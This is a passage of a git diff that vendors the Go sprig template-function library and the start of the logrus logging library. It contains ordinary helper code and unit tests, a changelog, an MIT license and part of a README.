runt(tpl, expect); err != nil { + t.Error(err) + } + } + +} +func TestBiggest(t *testing.T) { + tpl := `{{ biggest 1 2 3 345 5 6 7}}` + if err := runt(tpl, `345`); err != nil { + t.Error(err) + } + + tpl = `{{ max 345}}` + if err := runt(tpl, `345`); err != nil { + t.Error(err) + } +} +func TestMin(t *testing.T) { + tpl := `{{ min 1 2 3 345 5 6 7}}` + if err := runt(tpl, `1`); err != nil { + t.Error(err) + } + + tpl = `{{ min 345}}` + if err := runt(tpl, `345`); err != nil { + t.Error(err) + } +} + +func TestToFloat64(t *testing.T) { + target := float64(102) + if target != toFloat64(int8(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64(int(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64(int32(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64(int16(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64(int64(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64("102") { + t.Errorf("Expected 102") + } + if 0 != toFloat64("frankie") { + t.Errorf("Expected 0") + } + if target != toFloat64(uint16(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64(uint64(102)) { + t.Errorf("Expected 102") + } + if 102.1234 != toFloat64(float64(102.1234)) { + t.Errorf("Expected 102.1234") + } + if 1 != toFloat64(true) { + t.Errorf("Expected 102") + } +} +func TestToInt64(t *testing.T) { + target := int64(102) + if target != toInt64(int8(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(int(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(int32(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(int16(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(int64(102)) { + t.Errorf("Expected 102") + } + if target != toInt64("102") { + t.Errorf("Expected 102") + } + if 0 != toInt64("frankie") { + t.Errorf("Expected 0") + } + if target != toInt64(uint16(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(uint64(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(float64(102.1234)) { + t.Errorf("Expected 102") + } + if 1 != toInt64(true) { + t.Errorf("Expected 102") + } +} + +func TestToInt(t *testing.T) { + target := int(102) + if target != toInt(int8(102)) { + t.Errorf("Expected 102") + } + if target != toInt(int(102)) { + t.Errorf("Expected 102") + } + if target != toInt(int32(102)) { + t.Errorf("Expected 102") + } + if target != toInt(int16(102)) { + t.Errorf("Expected 102") + } + if target != toInt(int64(102)) { + t.Errorf("Expected 102") + } + if target != toInt("102") { + t.Errorf("Expected 102") + } + if 0 != toInt("frankie") { + t.Errorf("Expected 0") + } + if target != toInt(uint16(102)) { + t.Errorf("Expected 102") + } + if target != toInt(uint64(102)) { + t.Errorf("Expected 102") + } + if target != toInt(float64(102.1234)) { + t.Errorf("Expected 102") + } + if 1 != toInt(true) { + t.Errorf("Expected 102") + } +} + +func TestAdd(t *testing.T) { + tpl := `{{ 3 | add 1 2}}` + if err := runt(tpl, `6`); err != nil { + t.Error(err) + } +} + +func TestMul(t *testing.T) { + tpl := `{{ 1 | mul "2" 3 "4"}}` + if err := runt(tpl, `24`); err != nil { + t.Error(err) + } +} + +func TestCeil(t *testing.T){ + assert.Equal(t, 123.0, ceil(123)) + assert.Equal(t, 123.0, ceil("123")) + assert.Equal(t, 124.0, ceil(123.01)) + assert.Equal(t, 124.0, ceil("123.01")) +} + +func TestFloor(t *testing.T){ + assert.Equal(t, 123.0, floor(123)) + assert.Equal(t, 123.0, floor("123")) + assert.Equal(t, 123.0, floor(123.9999)) + assert.Equal(t, 123.0, floor("123.9999")) +} + +func TestRound(t *testing.T){ + assert.Equal(t, 123.556, round(123.5555, 3)) + assert.Equal(t, 123.556, round("123.55555", 3)) + assert.Equal(t, 124.0, round(123.500001, 0)) + assert.Equal(t, 123.0, round(123.49999999, 0)) + assert.Equal(t, 123.23, round(123.2329999, 2, .3)) + assert.Equal(t, 123.24, round(123.233, 2, .3)) +} diff --git a/vendor/github.com/Masterminds/sprig/reflect.go b/vendor/github.com/Masterminds/sprig/reflect.go new file mode 100644 index 0000000000..8a65c132f0 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/reflect.go @@ -0,0 +1,28 @@ +package sprig + +import ( + "fmt" + "reflect" +) + +// typeIs returns true if the src is the type named in target. +func typeIs(target string, src interface{}) bool { + return target == typeOf(src) +} + +func typeIsLike(target string, src interface{}) bool { + t := typeOf(src) + return target == t || "*"+target == t +} + +func typeOf(src interface{}) string { + return fmt.Sprintf("%T", src) +} + +func kindIs(target string, src interface{}) bool { + return target == kindOf(src) +} + +func kindOf(src interface{}) string { + return reflect.ValueOf(src).Kind().String() +} diff --git a/vendor/github.com/Masterminds/sprig/reflect_test.go b/vendor/github.com/Masterminds/sprig/reflect_test.go new file mode 100644 index 0000000000..515fae9c4f --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/reflect_test.go @@ -0,0 +1,73 @@ +package sprig + +import ( + "testing" +) + +type fixtureTO struct { + Name, Value string +} + +func TestTypeOf(t *testing.T) { + f := &fixtureTO{"hello", "world"} + tpl := `{{typeOf .}}` + if err := runtv(tpl, "*sprig.fixtureTO", f); err != nil { + t.Error(err) + } +} + +func TestKindOf(t *testing.T) { + tpl := `{{kindOf .}}` + + f := fixtureTO{"hello", "world"} + if err := runtv(tpl, "struct", f); err != nil { + t.Error(err) + } + + f2 := []string{"hello"} + if err := runtv(tpl, "slice", f2); err != nil { + t.Error(err) + } + + var f3 *fixtureTO = nil + if err := runtv(tpl, "ptr", f3); err != nil { + t.Error(err) + } +} + +func TestTypeIs(t *testing.T) { + f := &fixtureTO{"hello", "world"} + tpl := `{{if typeIs "*sprig.fixtureTO" .}}t{{else}}f{{end}}` + if err := runtv(tpl, "t", f); err != nil { + t.Error(err) + } + + f2 := "hello" + if err := runtv(tpl, "f", f2); err != nil { + t.Error(err) + } +} +func TestTypeIsLike(t *testing.T) { + f := "foo" + tpl := `{{if typeIsLike "string" .}}t{{else}}f{{end}}` + if err := runtv(tpl, "t", f); err != nil { + t.Error(err) + } + + // Now make a pointer. Should still match. + f2 := &f + if err := runtv(tpl, "t", f2); err != nil { + t.Error(err) + } +} +func TestKindIs(t *testing.T) { + f := &fixtureTO{"hello", "world"} + tpl := `{{if kindIs "ptr" .}}t{{else}}f{{end}}` + if err := runtv(tpl, "t", f); err != nil { + t.Error(err) + } + f2 := "hello" + if err := runtv(tpl, "f", f2); err != nil { + t.Error(err) + } +} diff --git a/vendor/github.com/Masterminds/sprig/regex.go b/vendor/github.com/Masterminds/sprig/regex.go new file mode 100644 index 0000000000..9fe033a6bd --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/regex.go @@ -0,0 +1,35 @@ +package sprig + +import ( + "regexp" +) + +func regexMatch(regex string, s string) bool { + match, _ := regexp.MatchString(regex, s) + return match +} + +func regexFindAll(regex string, s string, n int) []string { + r := regexp.MustCompile(regex) + return r.FindAllString(s, n) +} + +func regexFind(regex string, s string) string { + r := regexp.MustCompile(regex) + return r.FindString(s) +} + +func regexReplaceAll(regex string, s string, repl string) string { + r := regexp.MustCompile(regex) + return r.ReplaceAllString(s, repl) +} + +func regexReplaceAllLiteral(regex string, s string, repl string) string { + r := regexp.MustCompile(regex) + return r.ReplaceAllLiteralString(s, repl) +} + +func regexSplit(regex string, s string, n int) []string { + r := regexp.MustCompile(regex) + return r.Split(s, n) +} \ No newline at end of file diff --git a/vendor/github.com/Masterminds/sprig/regex_test.go b/vendor/github.com/Masterminds/sprig/regex_test.go new file mode 100644 index 0000000000..ccb87fe2f5 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/regex_test.go @@ -0,0 +1,61 @@ +package sprig + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestRegexMatch(t *testing.T) { + regex := "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}" + + assert.True(t, regexMatch(regex, "test@acme.com")) + assert.True(t, regexMatch(regex, "Test@Acme.Com")) + assert.False(t, regexMatch(regex, "test")) + assert.False(t, regexMatch(regex, "test.com")) + assert.False(t, regexMatch(regex, "test@acme")) +} + +func TestRegexFindAll(t *testing.T){ + regex := "a{2}" + assert.Equal(t, 1, len(regexFindAll(regex, "aa", -1))) + assert.Equal(t, 1, len(regexFindAll(regex, "aaaaaaaa", 1))) + assert.Equal(t, 2, len(regexFindAll(regex, "aaaa", -1))) + assert.Equal(t, 0, len(regexFindAll(regex, "none", -1))) +} + +func TestRegexFindl(t *testing.T){ + regex := "fo.?" + assert.Equal(t, "foo", regexFind(regex, "foorbar")) + assert.Equal(t, "foo", regexFind(regex, "foo foe fome")) + assert.Equal(t, "", regexFind(regex, "none")) +} + +func TestRegexReplaceAll(t *testing.T){ + regex := "a(x*)b" + assert.Equal(t, "-T-T-", regexReplaceAll(regex,"-ab-axxb-", "T")) + assert.Equal(t, "--xx-", regexReplaceAll(regex,"-ab-axxb-", "$1")) + assert.Equal(t, "---", regexReplaceAll(regex,"-ab-axxb-", "$1W")) + assert.Equal(t, "-W-xxW-", regexReplaceAll(regex,"-ab-axxb-", "${1}W")) +} + +func TestRegexReplaceAllLiteral(t *testing.T){ + regex := "a(x*)b" + assert.Equal(t, "-T-T-", regexReplaceAllLiteral(regex,"-ab-axxb-", "T")) + assert.Equal(t, "-$1-$1-", regexReplaceAllLiteral(regex,"-ab-axxb-", "$1")) + assert.Equal(t, "-${1}-${1}-", regexReplaceAllLiteral(regex,"-ab-axxb-", "${1}")) +} + +func TestRegexSplit(t *testing.T){ + regex := "a" + assert.Equal(t, 4, len(regexSplit(regex,"banana", -1))) + assert.Equal(t, 0, len(regexSplit(regex,"banana", 0))) + assert.Equal(t, 1, len(regexSplit(regex,"banana", 1))) + assert.Equal(t, 2, len(regexSplit(regex,"banana", 2))) + + regex = "z+" + assert.Equal(t, 2, len(regexSplit(regex,"pizza", -1))) + assert.Equal(t, 0, len(regexSplit(regex,"pizza", 0))) + assert.Equal(t, 1, len(regexSplit(regex,"pizza", 1))) + assert.Equal(t, 2, len(regexSplit(regex,"pizza", 2))) +} \ No newline at end of file diff --git a/vendor/github.com/Masterminds/sprig/semver.go b/vendor/github.com/Masterminds/sprig/semver.go new file mode 100644 index 0000000000..c2bf8a1fdf --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/semver.go @@ -0,0 +1,23 @@ +package sprig + +import ( + sv2 "github.com/Masterminds/semver" +) + +func semverCompare(constraint, version string) (bool, error) { + c, err := sv2.NewConstraint(constraint) + if err != nil { + return false, err + } + + v, err := sv2.NewVersion(version) + if err != nil { + return false, err + } + + return c.Check(v), nil +} + +func semver(version string) (*sv2.Version, error) { + return sv2.NewVersion(version) +} diff --git a/vendor/github.com/Masterminds/sprig/semver_test.go b/vendor/github.com/Masterminds/sprig/semver_test.go new file mode 100644 index 0000000000..53d3c8be9b --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/semver_test.go @@ -0,0 +1,31 @@ +package sprig + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestSemverCompare(t *testing.T) { + tests := map[string]string{ + `{{ semverCompare "1.2.3" "1.2.3" }}`: `true`, + `{{ semverCompare "^1.2.0" "1.2.3" }}`: `true`, + `{{ semverCompare "^1.2.0" "2.2.3" }}`: `false`, + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestSemver(t *testing.T) { + tests := map[string]string{ + `{{ $s := semver "1.2.3-beta.1+c0ff33" }}{{ $s.Prerelease }}`: "beta.1", + `{{ $s := semver "1.2.3-beta.1+c0ff33" }}{{ $s.Major}}`: "1", + `{{ semver "1.2.3" | (semver "1.2.3").Compare }}`: `0`, + `{{ semver "1.2.3" | (semver "1.3.3").Compare }}`: `1`, + `{{ semver "1.4.3" | (semver "1.2.3").Compare }}`: `-1`, + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} diff --git a/vendor/github.com/Masterminds/sprig/strings.go b/vendor/github.com/Masterminds/sprig/strings.go new file mode 100644 index 0000000000..f6afa2ff9e --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/strings.go @@ -0,0 +1,201 @@ +package sprig + +import ( + "encoding/base32" + "encoding/base64" + "fmt" + "reflect" + "strconv" + "strings" + + util "github.com/aokoli/goutils" +) + +func base64encode(v string) string { + return base64.StdEncoding.EncodeToString([]byte(v)) +} + +func base64decode(v string) string { + data, err := base64.StdEncoding.DecodeString(v) + if err != nil { + return err.Error() + } + return string(data) +} + +func base32encode(v string) string { + return base32.StdEncoding.EncodeToString([]byte(v)) +} + +func base32decode(v string) string { + data, err := base32.StdEncoding.DecodeString(v) + if err != nil { + return err.Error() + } + return string(data) +} + +func abbrev(width int, s string) string { + if width < 4 { + return s + } + r, _ := util.Abbreviate(s, width) + return r +} + +func abbrevboth(left, right int, s string) string { + if right < 4 || left > 0 && right < 7 { + return s + } + r, _ := util.AbbreviateFull(s, left, right) + return r +} +func initials(s string) string { + // Wrap this just to eliminate the var args, which templates don't do well. + return util.Initials(s) +} + +func randAlphaNumeric(count int) string { + // It is not possible, it appears, to actually generate an error here. + r, _ := util.RandomAlphaNumeric(count) + return r +} + +func randAlpha(count int) string { + r, _ := util.RandomAlphabetic(count) + return r +} + +func randAscii(count int) string { + r, _ := util.RandomAscii(count) + return r +} + +func randNumeric(count int) string { + r, _ := util.RandomNumeric(count) + return r +} + +func untitle(str string) string { + return util.Uncapitalize(str) +} + +func quote(str ...interface{}) string { + out := make([]string, len(str)) + for i, s := range str { + out[i] = fmt.Sprintf("%q", strval(s)) + } + return strings.Join(out, " ") +} + +func squote(str ...interface{}) string { + out := make([]string, len(str)) + for i, s := range str { + out[i] = fmt.Sprintf("'%v'", s) + } + return strings.Join(out, " ") +} + +func cat(v ...interface{}) string { + r := strings.TrimSpace(strings.Repeat("%v ", len(v))) + return fmt.Sprintf(r, v...) +} + +func indent(spaces int, v string) string { + pad := strings.Repeat(" ", spaces) + return pad + strings.Replace(v, "\n", "\n"+pad, -1) +} + +func nindent(spaces int, v string) string { + return "\n" + indent(spaces, v) +} + +func replace(old, new, src string) string { + return strings.Replace(src, old, new, -1) +} + +func plural(one, many string, count int) string { + if count == 1 { + return one + } + return many +} + +func strslice(v interface{}) []string { + switch v := v.(type) { + case []string: + return v + case []interface{}: + l := len(v) + b := make([]string, l) + for i := 0; i < l; i++ { + b[i] = strval(v[i]) + } + return b + default: + val := reflect.ValueOf(v) + switch val.Kind() { + case reflect.Array, reflect.Slice: + l := val.Len() + b := make([]string, l) + for i := 0; i < l; i++ { + b[i] = strval(val.Index(i).Interface()) + } + return b + default: + return []string{strval(v)} + } + } +} + +func strval(v interface{}) string { + switch v := v.(type) { + case string: + return v + case []byte: + return string(v) + case error: + return v.Error() + case fmt.Stringer: + return v.String() + default: + return fmt.Sprintf("%v", v) + } +} + +func trunc(c int, s string) string { + if len(s) <= c { + return s + } + return s[0:c] +} + +func join(sep string, v interface{}) string { + return strings.Join(strslice(v), sep) +} + +func split(sep, orig string) map[string]string { + parts := strings.Split(orig, sep) + res := make(map[string]string, len(parts)) + for i, v := range parts { + res["_"+strconv.Itoa(i)] = v + } + return res +} + +// substring creates a substring of the given string. +// +// If start is < 0, this calls string[:length]. +// +// If start is >= 0 and length < 0, this calls string[start:] +// +// Otherwise, this calls string[start, length]. +func substring(start, length int, s string) string { + if start < 0 { + return s[:length] + } + if length < 0 { + return s[start:] + } + return s[start:length] +} diff --git a/vendor/github.com/Masterminds/sprig/strings_test.go b/vendor/github.com/Masterminds/sprig/strings_test.go new file mode 100644 index 0000000000..79bfcf5483 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/strings_test.go @@ -0,0 +1,227 @@ +package sprig + +import ( + "encoding/base32" + "encoding/base64" + "fmt" + "math/rand" + "testing" + + "github.com/aokoli/goutils" + "github.com/stretchr/testify/assert" +) + +func TestSubstr(t *testing.T) { + tpl := `{{"fooo" | substr 0 3 }}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } +} + +func TestTrunc(t *testing.T) { + tpl := `{{ "foooooo" | trunc 3 }}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } +} + +func TestQuote(t *testing.T) { + tpl := `{{quote "a" "b" "c"}}` + if err := runt(tpl, `"a" "b" "c"`); err != nil { + t.Error(err) + } + tpl = `{{quote "\"a\"" "b" "c"}}` + if err := runt(tpl, `"\"a\"" "b" "c"`); err != nil { + t.Error(err) + } + tpl = `{{quote 1 2 3 }}` + if err := runt(tpl, `"1" "2" "3"`); err != nil { + t.Error(err) + } +} +func TestSquote(t *testing.T) { + tpl := `{{squote "a" "b" "c"}}` + if err := runt(tpl, `'a' 'b' 'c'`); err != nil { + t.Error(err) + } + tpl = `{{squote 1 2 3 }}` + if err := runt(tpl, `'1' '2' '3'`); err != nil { + t.Error(err) + } +} + +func TestContains(t *testing.T) { + // Mainly, we're just verifying the paramater order swap. + tests := []string{ + `{{if contains "cat" "fair catch"}}1{{end}}`, + `{{if hasPrefix "cat" "catch"}}1{{end}}`, + `{{if hasSuffix "cat" "ducat"}}1{{end}}`, + } + for _, tt := range tests { + if err := runt(tt, "1"); err != nil { + t.Error(err) + } + } +} + +func TestTrim(t *testing.T) { + tests := []string{ + `{{trim " 5.00 "}}`, + `{{trimAll "$" "$5.00$"}}`, + `{{trimPrefix "$" "$5.00"}}`, + `{{trimSuffix "$" "5.00$"}}`, + } + for _, tt := range tests { + if err := runt(tt, "5.00"); err != nil { + t.Error(err) + } + } +} + +func TestSplit(t *testing.T) { + tpl := `{{$v := "foo$bar$baz" | split "$"}}{{$v._0}}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } +} + +func TestToString(t *testing.T) { + tpl := `{{ toString 1 | kindOf }}` + assert.NoError(t, runt(tpl, "string")) +} + +func TestToStrings(t *testing.T) { + tpl := `{{ $s := list 1 2 3 | toStrings }}{{ index $s 1 | kindOf }}` + assert.NoError(t, runt(tpl, "string")) +} + +func TestJoin(t *testing.T) { + assert.NoError(t, runt(`{{ tuple "a" "b" "c" | join "-" }}`, "a-b-c")) + assert.NoError(t, runt(`{{ tuple 1 2 3 | join "-" }}`, "1-2-3")) + assert.NoError(t, runtv(`{{ join "-" .V }}`, "a-b-c", map[string]interface{}{"V": []string{"a", "b", "c"}})) + assert.NoError(t, runtv(`{{ join "-" .V }}`, "abc", map[string]interface{}{"V": "abc"})) + assert.NoError(t, runtv(`{{ join "-" .V }}`, "1-2-3", map[string]interface{}{"V": []int{1, 2, 3}})) +} + +func TestSortAlpha(t *testing.T) { + // Named `append` in the function map + tests := map[string]string{ + `{{ list "c" "a" "b" | sortAlpha | join "" }}`: "abc", + `{{ list 2 1 4 3 | sortAlpha | join "" }}`: "1234", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} +func TestBase64EncodeDecode(t *testing.T) { + magicWord := "coffee" + expect := base64.StdEncoding.EncodeToString([]byte(magicWord)) + + if expect == magicWord { + t.Fatal("Encoder doesn't work.") + } + + tpl := `{{b64enc "coffee"}}` + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + tpl = fmt.Sprintf("{{b64dec %q}}", expect) + if err := runt(tpl, magicWord); err != nil { + t.Error(err) + } +} +func TestBase32EncodeDecode(t *testing.T) { + magicWord := "coffee" + expect := base32.StdEncoding.EncodeToString([]byte(magicWord)) + + if expect == magicWord { + t.Fatal("Encoder doesn't work.") + } + + tpl := `{{b32enc "coffee"}}` + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + tpl = fmt.Sprintf("{{b32dec %q}}", expect) + if err := runt(tpl, magicWord); err != nil { + t.Error(err) + } +} + +func TestGoutils(t *testing.T) { + tests := map[string]string{ + `{{abbrev 5 "hello world"}}`: "he...", + `{{abbrevboth 5 10 "1234 5678 9123"}}`: "...5678...", + `{{nospace "h e l l o "}}`: "hello", + `{{untitle "First Try"}}`: "first try", //https://youtu.be/44-RsrF_V_w + `{{initials "First Try"}}`: "FT", + `{{wrap 5 "Hello World"}}`: "Hello\nWorld", + `{{wrapWith 5 "\t" "Hello World"}}`: "Hello\tWorld", + } + for k, v := range tests { + t.Log(k) + if err := runt(k, v); err != nil { + t.Errorf("Error on tpl %q: %s", k, err) + } + } +} + +func TestRandom(t *testing.T) { + // One of the things I love about Go: + goutils.RANDOM = rand.New(rand.NewSource(1)) + + // Because we're using a random number generator, we need these to go in + // a predictable sequence: + if err := runt(`{{randAlphaNum 5}}`, "9bzRv"); err != nil { + t.Errorf("Error on tpl: %s", err) + } + if err := runt(`{{randAlpha 5}}`, "VjwGe"); err != nil { + t.Errorf("Error on tpl: %s", err) + } + if err := runt(`{{randAscii 5}}`, "1KA5p"); err != nil { + t.Errorf("Error on tpl: %s", err) + } + if err := runt(`{{randNumeric 5}}`, "26018"); err != nil { + t.Errorf("Error on tpl: %s", err) + } + +} + +func TestCat(t *testing.T) { + tpl := `{{$b := "b"}}{{"c" | cat "a" $b}}` + if err := runt(tpl, "a b c"); err != nil { + t.Error(err) + } +} + +func TestIndent(t *testing.T) { + tpl := `{{indent 4 "a\nb\nc"}}` + if err := runt(tpl, " a\n b\n c"); err != nil { + t.Error(err) + } +} + +func TestNindent(t *testing.T) { + tpl := `{{nindent 4 "a\nb\nc"}}` + if err := runt(tpl, "\n a\n b\n c"); err != nil { + t.Error(err) + } +} + +func TestReplace(t *testing.T) { + tpl := `{{"I Am Henry VIII" | replace " " "-"}}` + if err := runt(tpl, "I-Am-Henry-VIII"); err != nil { + t.Error(err) + } +} + +func TestPlural(t *testing.T) { + tpl := `{{$num := len "two"}}{{$num}} {{$num | plural "1 char" "chars"}}` + if err := runt(tpl, "3 chars"); err != nil { + t.Error(err) + } + tpl = `{{len "t" | plural "cheese" "%d chars"}}` + if err := runt(tpl, "cheese"); err != nil { + t.Error(err) + } +} diff --git a/vendor/github.com/Sirupsen/logrus/.gitignore b/vendor/github.com/Sirupsen/logrus/.gitignore new file mode 100644 index 0000000000..66be63a005 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/.gitignore @@ -0,0 +1 @@ +logrus diff --git a/vendor/github.com/Sirupsen/logrus/.travis.yml b/vendor/github.com/Sirupsen/logrus/.travis.yml new file mode 100644 index 0000000000..a23296a53b --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/.travis.yml @@ -0,0 +1,15 @@ +language: go +go: + - 1.6.x + - 1.7.x + - 1.8.x + - tip +env: + - GOMAXPROCS=4 GORACE=halt_on_error=1 +install: + - go get github.com/stretchr/testify/assert + - go get gopkg.in/gemnasium/logrus-airbrake-hook.v2 + - go get golang.org/x/sys/unix + - go get golang.org/x/sys/windows +script: + - go test -race -v ./... diff --git a/vendor/github.com/Sirupsen/logrus/CHANGELOG.md b/vendor/github.com/Sirupsen/logrus/CHANGELOG.md new file mode 100644 index 0000000000..1bd1deb294 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/CHANGELOG.md @@ -0,0 +1,123 @@ +# 1.0.5 + +* Fix hooks race (#707) +* Fix panic deadlock (#695) + +# 1.0.4 + +* Fix race when adding hooks (#612) +* Fix terminal check in AppEngine (#635) + +# 1.0.3 + +* Replace example files with testable examples + +# 1.0.2 + +* bug: quote non-string values in text formatter (#583) +* Make (*Logger) SetLevel a public method + +# 1.0.1 + +* bug: fix escaping in text formatter (#575) + +# 1.0.0 + +* Officially changed name to lower-case +* bug: colors on Windows 10 (#541) +* bug: fix race in accessing level (#512) + +# 0.11.5 + +* feature: add writer and writerlevel to entry (#372) + +# 0.11.4 + +* bug: fix undefined variable on solaris (#493) + +# 0.11.3 + +* formatter: configure quoting of empty values (#484) +* formatter: configure quoting character (default is `"`) (#484) +* bug: fix not importing io correctly in non-linux environments (#481) + +# 0.11.2 + +* bug: fix windows terminal detection (#476) + +# 0.11.1 + +* bug: fix tty detection with custom out (#471) + +# 0.11.0 + +* performance: Use bufferpool to allocate (#370) +* terminal: terminal detection for app-engine (#343) +* feature: exit handler (#375) + +# 0.10.0 + +* feature: Add a test hook (#180) +* feature: `ParseLevel` is now case-insensitive (#326) +* feature: `FieldLogger` interface that generalizes `Logger` and `Entry` (#308) +* performance: avoid re-allocations on `WithFields` (#335) + +# 0.9.0 + +* logrus/text_formatter: don't emit empty msg +* logrus/hooks/airbrake: move out of main repository +* logrus/hooks/sentry: move out of main repository +* logrus/hooks/papertrail: move out of main repository +* logrus/hooks/bugsnag: move out of main repository +* logrus/core: run tests with `-race` +* logrus/core: detect TTY based on `stderr` +* logrus/core: support `WithError` on logger +* logrus/core: Solaris support + +# 0.8.7 + +* logrus/core: fix possible race (#216) +* logrus/doc: small typo fixes and doc improvements + + +# 0.8.6 + +* hooks/raven: allow passing an initialized client + +# 0.8.5 + +* logrus/core: revert #208 + +# 0.8.4 + +* formatter/text: fix data race (#218) + +# 0.8.3 + +* logrus/core: fix entry log level (#208) +* logrus/core: improve performance of text formatter by 40% +* logrus/core: expose `LevelHooks` type +* logrus/core: add support for DragonflyBSD and NetBSD +* formatter/text: print structs more verbosely + +# 0.8.2 + +* logrus: fix more Fatal family functions + +# 0.8.1 + +* logrus: fix not exiting on `Fatalf` and `Fatalln` + +# 0.8.0 + +* logrus: defaults to stderr instead of stdout +* hooks/sentry: add special field for `*http.Request` +* formatter/text: ignore Windows for colors + +# 0.7.3 + +* formatter/\*: allow configuration of timestamp layout + +# 0.7.2 + +* formatter/text: Add configuration option for time format (#158) diff --git a/vendor/github.com/Sirupsen/logrus/LICENSE b/vendor/github.com/Sirupsen/logrus/LICENSE new file mode 100644 index 0000000000..f090cb42f3 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/LICENSE @@ -0,0 +1,21 @@ +The MIT License (MIT) + +Copyright (c) 2014 Simon Eskildsen + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/vendor/github.com/Sirupsen/logrus/README.md b/vendor/github.com/Sirupsen/logrus/README.md new file mode 100644 index 0000000000..f77819b168 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/README.md @@ -0,0 +1,511 @@ +# Logrus :walrus: [![Build Status](https://travis-ci.org/sirupsen/logrus.svg?branch=master)](https://travis-ci.org/sirupsen/logrus) [![GoDoc](https://godoc.org/github.com/sirupsen/logrus?status.svg)](https://godoc.org/github.com/sirupsen/logrus) + +Logrus is a structured logger for Go (golang), completely API compatible with +the standard library logger. + +**Seeing weird case-sensitive problems?** It's in the past been possible to +import Logrus as both upper- and lower-case. Due to the Go package environment, +this caused issues in the community and we needed a standard. Some environments +experienced problems with the upper-case variant, so the lower-case was decided. +Everything using `logrus` will need to use the lower-case: +`github.com/sirupsen/logrus`. Any package that isn't, should be changed. + +To fix Glide, see [these +comments](https://github.com/sirupsen/logrus/issues/553#issuecomment-306591437). +For an in-depth explanation of the casing issue, see [this +comment](https://github.com/sirupsen/logrus/issues/570#issuecomment-313933276). + +**Are you interested in assisting in maintaining Logrus?** Currently I have a +lot of obligations, and I am unable to provide Logrus with the maintainership it +needs. If you'd like to help, please reach out to me at `simon at author's +username dot com`. + +Nicely color-coded in development (when a TTY is attached, otherwise just +plain text): + +![Colored](http://i.imgur.com/PY7qMwd.png) + +With `log.SetFormatter(&log.JSONFormatter{})`, for easy parsing by logstash +or Splunk: + +```json +{"animal":"walrus","level":"info","msg":"A group of walrus emerges from the +ocean","size":10,"time":"2014-03-10 19:57:38.562264131 -0400 EDT"} + +{"level":"warning","msg":"The group's number increased tremendously!", +"number":122,"omg":true,"time":"2014-03-10 19:57:38.562471297 -0400 EDT"} + +{"animal":"walrus","level":"info","msg":"A giant walrus appears!", +"size":10,"time":"2014-03-10 19:57:38.562500591 -0400 EDT"} + +{"animal":"walrus","level":"info","msg":"Tremendously sized cow enters the ocean.", +"size":9,"time":"2014-03-10 19:57:38.562527896 -0400 EDT"} + +{"level":"fatal","msg":"The ice breaks!","number":100,"omg":true, +"time":"2014-03-10 19:57:38.562543128 -0400 EDT"} +``` + +With the default `log.SetFormatter(&log.TextFormatter{})` when a TTY is not +attached, the output is compatible with the +[logfmt](http://godoc.org/github.com/kr/logfmt) format: + +```text +time="2015-03-26T01:27:38-04:00" level=debug msg="Started observing beach" animal=walrus number=8 +time="2015-03-26T01:27:38-04:00" level=info msg="A group of walrus emerges from the ocean" animal=walrus size=10 +time="2015-03-26T01:27:38-04:00" level=warning msg="The group's number increased tremendously!" number=122 omg=true +time="2015-03-26T01:27:38-04:00" level=debug msg="Temperature changes" temperature=-4 +time="2015-03-26T01:27:38-04:00" level=panic msg="It's over 9000!" animal=orca size=9009 +time="2015-03-26T01:27:38-04:00" level=fatal msg="The ice breaks!" err=&{0x2082280c0 map[animal:orca size:9009] 2015-03-26 01:27:38.441574009 -0400 EDT panic It's over 9000!} number=100 omg=true +exit status 1 +``` + +#### Case-sensitivity + +The organization's name was changed to lower-case--and this will not be changed +back. If you are getting import conflicts due to case sensitivity, 